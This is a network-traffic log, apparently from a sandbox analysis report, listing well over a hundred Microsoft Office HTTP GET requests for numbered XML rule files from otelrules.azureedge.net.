Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
